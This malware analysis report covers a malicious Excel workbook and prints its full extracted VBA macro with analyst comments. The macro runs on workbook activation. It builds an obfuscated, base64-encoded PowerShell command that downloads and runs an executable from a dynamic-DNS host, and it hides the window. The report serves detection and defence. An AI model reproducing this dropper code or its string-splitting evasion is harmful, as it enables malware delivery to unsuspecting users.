Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5b3f021a6fe62d3…

MALICIOUS

Office (OLE)

6.0 KB First seen: 2021-11-02
MD5: 9274ea0bd926f877953b4c77d2904d5d SHA-1: e608471775cdd438942a43deb0c48c66401587bc SHA-256: c5b3f021a6fe62d30bc05e30bdda5929899c0dce5a987ec273897434afa99eec
140 Risk Score

Heuristics 3

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2705 bytes
SHA-256: 13c35adffc297f02c8d767dee764a59dd002c92378c122d03babb4f4f380c7f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Name "ThisWorkbook" together with the
' Excel Workbook class GUID in VB_Base means the Sub that follows is a
' workbook-level event handler, not a routine in an ordinary code module.


' Analyst notes (static): Workbook_Activate is an Excel event handler that
' fires when the workbook becomes the active window, so once macros are
' enabled this runs without any further user action.
' What the code below does: assembles a single command line from split string
' literals, writes it to a .bat file, and launches that file with a hidden
' window via Shell(). Nothing here is a document feature; the sole output is a
' child process.
' Detection angle: Excel writing a *.bat and spawning cmd.exe, which then
' starts powershell.exe with -enc, is the process/file chain to alert on.
Private Sub Workbook_Activate()
' Every runtime error is swallowed, so a failed file write or download never
' shows a dialog to the user.
On Error Resume Next

Dim bat As String


Dim s As String

' The fragments concatenated into s over the next lines join up to:
'   start /MIN C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc
' (followed by a trailing space). No single literal contains "powershell" or
' "System32" -- this is the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION finding. "-win 1"
' appears to be -WindowStyle with the Hidden value; "-enc" is -EncodedCommand.
s = s + "start "
' a, dfdf, fwefewf and ewfwef are declared between the concatenations and
' never used: filler with no functional effect, presumably to break up
' pattern matching.
Dim a As String
s = s + "/MI" + "N C:\Wi" + "ndo"
Dim dfdf As String
s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer"
Dim fwefewf As String
s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe"
Dim ewfwef As String
s = s + " -win " + "1 -e" + "nc "


' The next 40 literals form one base64 string (12 chars each, 360 bytes).
' -EncodedCommand takes UTF-16LE; decoding gives (analyst decode, re-verify
' before acting on it):
'   $ProcName = "Fwajwklaobsarjyvvo.exe";
'   (New-Object System.Net.WebClient).DownloadFile("nanorgin.ydns.eu/office.exe","$env:APPDATA\$ProcName");
'   Start-Process ("$env:APPDATA\$ProcName")
' i.e. fetch a second-stage executable from a dynamic-DNS host into %APPDATA%
' and run it. The decoded URL carries no scheme; whether the download works
' as written cannot be determined statically. Host, file name and the
' %APPDATA% drop path are the network/file indicators to block and hunt for.
s = s + "JABQAHIAbwBj"
s = s + "AE4AYQBtAGUA"
s = s + "IAA9ACAAIgBG"
s = s + "AHcAYQBqAHcA"
s = s + "awBsAGEAbwBi"
s = s + "AHMAYQByAGoA"
s = s + "eQB2AHYAbwAu"
s = s + "AGUAeABlACIA"
s = s + "OwAoAE4AZQB3"
s = s + "AC0ATwBiAGoA"
s = s + "ZQBjAHQAIABT"
s = s + "AHkAcwB0AGUA"
s = s + "bQAuAE4AZQB0"
s = s + "AC4AVwBlAGIA"
s = s + "QwBsAGkAZQBu"
s = s + "AHQAKQAuAEQA"
s = s + "bwB3AG4AbABv"
s = s + "AGEAZABGAGkA"
s = s + "bABlACgAIgBu"
s = s + "AGEAbgBvAHIA"
s = s + "ZwBpAG4ALgB5"
s = s + "AGQAbgBzAC4A"
s = s + "ZQB1AC8AbwBm"
s = s + "AGYAaQBjAGUA"
s = s + "LgBlAHgAZQAi"
s = s + "ACwAIgAkAGUA"
s = s + "bgB2ADoAQQBQ"
s = s + "AFAARABBAFQA"
s = s + "QQBcACQAUABy"
s = s + "AG8AYwBOAGEA"
s = s + "bQBlACIAKQA7"
s = s + "AFMAdABhAHIA"
s = s + "dAAtAFAAcgBv"
s = s + "AGMAZQBzAHMA"
s = s + "IAAoACIAJABl"
s = s + "AG4AdgA6AEEA"
s = s + "UABQAEQAQQBU"
s = s + "AEEAXAAkAFAA"
s = s + "cgBvAGMATgBh"
s = s + "AG0AZQAiACkA"


Dim x As Double

' Saves the workbook before dropping the file. The purpose is not
' determinable from the code alone.
ActiveWorkbook.Save

' Bare file name, so the .bat is created relative to the VBA current
' directory rather than at a fixed path; the name is the file indicator.
bat = "Ldnpqepnzeokdw.bat"

' Writes the assembled command line as the only content of the .bat, then
' executes it. Shell's second argument 0 is vbHide, so no console window is
' shown; the task ID Shell returns is stored in x and never used.
Open bat For Output As #1
    Print #1, s 
    Close #1
    x = Shell(bat, 0)

End Sub


' The remaining modules carry only olevba attribute headers and no code.
' The VB_Base GUID 00020820-... is Excel's Worksheet class, so "Start",
' "Learn more" and "Workbook" are three worksheet modules. The sheet names
' are consistent with a lure document, but the sheets' contents are not
' shown here.
Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Learn more"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True